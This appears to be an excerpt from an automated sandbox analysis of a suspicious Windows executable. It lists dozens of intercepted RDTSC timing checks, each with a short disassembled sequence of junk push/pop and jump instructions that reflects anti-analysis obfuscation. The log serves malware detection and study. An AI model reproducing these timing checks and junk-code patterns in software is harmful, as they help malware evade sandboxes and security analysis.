Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE1B7B second address: EE1B8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F262CBE4E8Fh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE1B8F second address: EC36DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F262D38FB18h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F262D38FB08h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 pushad 0x00000029 movzx eax, cx 0x0000002c mov ecx, dword ptr [ebp+12A029BEh] 0x00000032 popad 0x00000033 call dword ptr [ebp+12A0290Eh] 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE20B3 second address: EE20B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE22AF second address: EE22B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE22B3 second address: EE22DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 jc 00007F262CBE4E92h 0x0000000e jnl 00007F262CBE4E8Ch 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 push eax 0x00000019 push edx 0x0000001a jnp 00007F262CBE4E88h 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE22DB second address: EE230A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F262D38FB06h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [eax] 0x00000010 push edi 0x00000011 push ebx 0x00000012 jbe 00007F262D38FB06h 0x00000018 pop ebx 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F262D38FB0Dh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE230A second address: EE2318 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E8Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE2318 second address: EE2326 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F262D38FB0Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE255F second address: EE2597 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E94h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F262CBE4E98h 0x00000013 push esi 0x00000014 pop esi 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE293B second address: EE294A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F262D38FB06h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE294A second address: EE29A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E98h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F262CBE4E95h 0x00000010 nop 0x00000011 mov edx, dword ptr [ebp+12B8CF11h] 0x00000017 push 0000001Eh 0x00000019 or dl, 0000002Fh 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F262CBE4E98h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE2C62 second address: EE2C7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB14h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE2C7A second address: EE2C9A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007F262CBE4E95h 0x00000011 jmp 00007F262CBE4E8Fh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE2C9A second address: EE2CA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE2CA0 second address: EE2CA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE2CA4 second address: EE2CBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F262D38FB08h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE2CBA second address: EE2CEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262CBE4E90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007F262CBE4E93h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 push edi 0x00000018 pop edi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F1350C second address: F13526 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F262D38FB0Eh 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007F262D38FB06h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F137AD second address: F137B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F262CBE4E86h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F137B9 second address: F137CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jbe 00007F262D38FB12h 0x0000000d jp 00007F262D38FB06h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F137CE second address: F137D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F137D6 second address: F137DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F137DA second address: F137FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F262CBE4E8Bh 0x0000000b popad 0x0000000c push ecx 0x0000000d pushad 0x0000000e jmp 00007F262CBE4E8Fh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F13A88 second address: F13A95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F262D38FB06h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F13BCA second address: F13BCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F13D4A second address: F13D70 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F262D38FB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007F262D38FB17h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F13D70 second address: F13D9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F262CBE4E8Eh 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F262CBE4E91h 0x00000014 jnl 00007F262CBE4E86h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F13D9E second address: F13DA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F1946A second address: F1946E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F1946E second address: F1947E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F262D38FB0Eh 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F1C770 second address: F1C777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F22965 second address: F2298A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F262D38FB17h 0x00000009 pop ebx 0x0000000a pushad 0x0000000b js 00007F262D38FB06h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F2167E second address: F216AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F262CBE4E86h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F262CBE4E99h 0x00000012 jc 00007F262CBE4E86h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F216AA second address: F216BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB0Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F216BC second address: F216C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F216C2 second address: F216C7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F21BF7 second address: F21C05 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F262CBE4E88h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F220C9 second address: F220D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F25486 second address: F254DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jo 00007F262CBE4EB2h 0x0000000b jmp 00007F262CBE4E95h 0x00000010 jmp 00007F262CBE4E97h 0x00000015 jmp 00007F262CBE4E94h 0x0000001a popad 0x0000001b pushad 0x0000001c pushad 0x0000001d push edx 0x0000001e pop edx 0x0000001f push esi 0x00000020 pop esi 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F254DA second address: F254F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F262D38FB16h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F254F9 second address: F254FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F254FD second address: F25510 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F262D38FB06h 0x00000008 jg 00007F262D38FB06h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F25686 second address: F2568A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F2568A second address: F256BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F262D38FB17h 0x00000007 jmp 00007F262D38FB19h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F29582 second address: F2958C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F262CBE4E86h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F2958C second address: F2959E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F262D38FB0Ch 0x0000000c jp 00007F262D38FB06h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F2D430 second address: F2D43A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F2D43A second address: F2D44B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jne 00007F262D38FB0Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F2CB46 second address: F2CB82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F262CBE4E86h 0x00000009 jmp 00007F262CBE4E92h 0x0000000e jbe 00007F262CBE4E86h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F262CBE4E94h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F2CB82 second address: F2CB88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F2CB88 second address: F2CB94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F2CB94 second address: F2CB9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F323ED second address: F32403 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F262CBE4E92h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F32564 second address: F3256C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F3256C second address: F32570 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F32ADB second address: F32AE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F32AE1 second address: F32AE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: EE27E5 second address: EE27EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F32C92 second address: F32C97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F32C97 second address: F32C9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F36ED1 second address: F36EF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jl 00007F262CBE4E96h 0x0000000d jmp 00007F262CBE4E8Ah 0x00000012 jnp 00007F262CBE4E86h 0x00000018 push ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F3720A second address: F37212 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F37212 second address: F3722D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F262CBE4E8Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007F262CBE4E86h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F373AA second address: F373B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F373B0 second address: F373B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F3750F second address: F37513 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F37513 second address: F37519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F37519 second address: F37533 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F262D38FB14h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F37533 second address: F37537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F37537 second address: F3753D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F3753D second address: F3756E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push esi 0x0000000e pop esi 0x0000000f jmp 00007F262CBE4E8Fh 0x00000014 popad 0x00000015 jmp 00007F262CBE4E92h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F37724 second address: F37730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F262D38FB0Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F4099B second address: F4099F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F3EAE5 second address: F3EAFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F262D38FB13h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F3EF34 second address: F3EF46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F262CBE4E86h 0x0000000a jng 00007F262CBE4E86h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F3FDCD second address: F3FDD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F262D38FB06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F3FDD7 second address: F3FDDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F400B0 second address: F400CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jng 00007F262D38FB18h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F400CD second address: F400D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F400D3 second address: F400D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F400D7 second address: F400E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007F262CBE4E86h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F400E9 second address: F400ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F400ED second address: F400FF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jg 00007F262CBE4E86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F400FF second address: F4010B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F262D38FB06h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F4010B second address: F40121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jmp 00007F262CBE4E8Ch 0x0000000b pop edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F40121 second address: F40129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F403DB second address: F4041A instructions: 0x00000000 rdtsc 0x00000002 jl 00007F262CBE4E8Ch 0x00000008 jo 00007F262CBE4E86h 0x0000000e jmp 00007F262CBE4E90h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 push ecx 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007F262CBE4E97h 0x0000001e pop ecx 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F4559C second address: F455C9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F262D38FB0Ch 0x00000008 jl 00007F262D38FB06h 0x0000000e push eax 0x0000000f push edx 0x00000010 jno 00007F262D38FB06h 0x00000016 jmp 00007F262D38FB17h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F4463E second address: F44644 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F44644 second address: F4464B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\B43WRnzSPD.exeRDTSC instruction interceptor: First address: F44C7E second address: F44C88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F262CBE4E86h 0x0000000a rdtsc
